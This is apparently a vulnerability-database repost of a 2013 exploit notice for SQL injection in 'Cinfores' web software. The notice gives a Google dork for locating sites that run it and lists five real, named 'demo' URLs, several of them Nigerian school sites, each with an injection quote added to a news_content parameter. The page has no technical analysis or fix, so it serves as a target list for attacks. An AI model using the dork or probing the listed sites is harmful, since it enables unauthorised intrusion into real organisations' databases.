Cinfores SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044443 漏洞类型
发布时间 2013-09-13 更新时间 2013-09-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013090102
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
 |-------------------------------------------------------------------------|
 | [/] Exploit Title: Cinfores Sql Injection Vulnerability
 |
 | [\] Exploit Author: Ashiyane Digital Security Team
 |
 | [/] Softeare Link : http://www.cinfores.com
 |
 | [\] Google Dork: intext:"Powered by Cinfores"
 |
 | [\] Tested on: Windows,Linux
 |-------------------------------------------------------------------------|
 | [/] Exploit: all websites Sql Injection
 |-------------------------------------------------------------------------|
 | [/] Demo site:
 | [\] http://www.abeconline.com/new_abec1/news_content.php?idx='
 | [/] http://www.ndssonline.com/new_ndss/news_content.php?idx='
 | [\] http://www.emaridonline.com/new_emarid/news_content.php?newsidx='
 | [/] http://www.misph.sch.ng/goldspring/news_content.asp?newsid='
 | [\] http://staffschool.ust.edu.ng/new_staffschool/news_content.php?idx='
 |-------------------------------------------------------------------------|
 | [/]Discovered By :ACC3SS
 |-------------------------------------------------------------------------|
 |-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|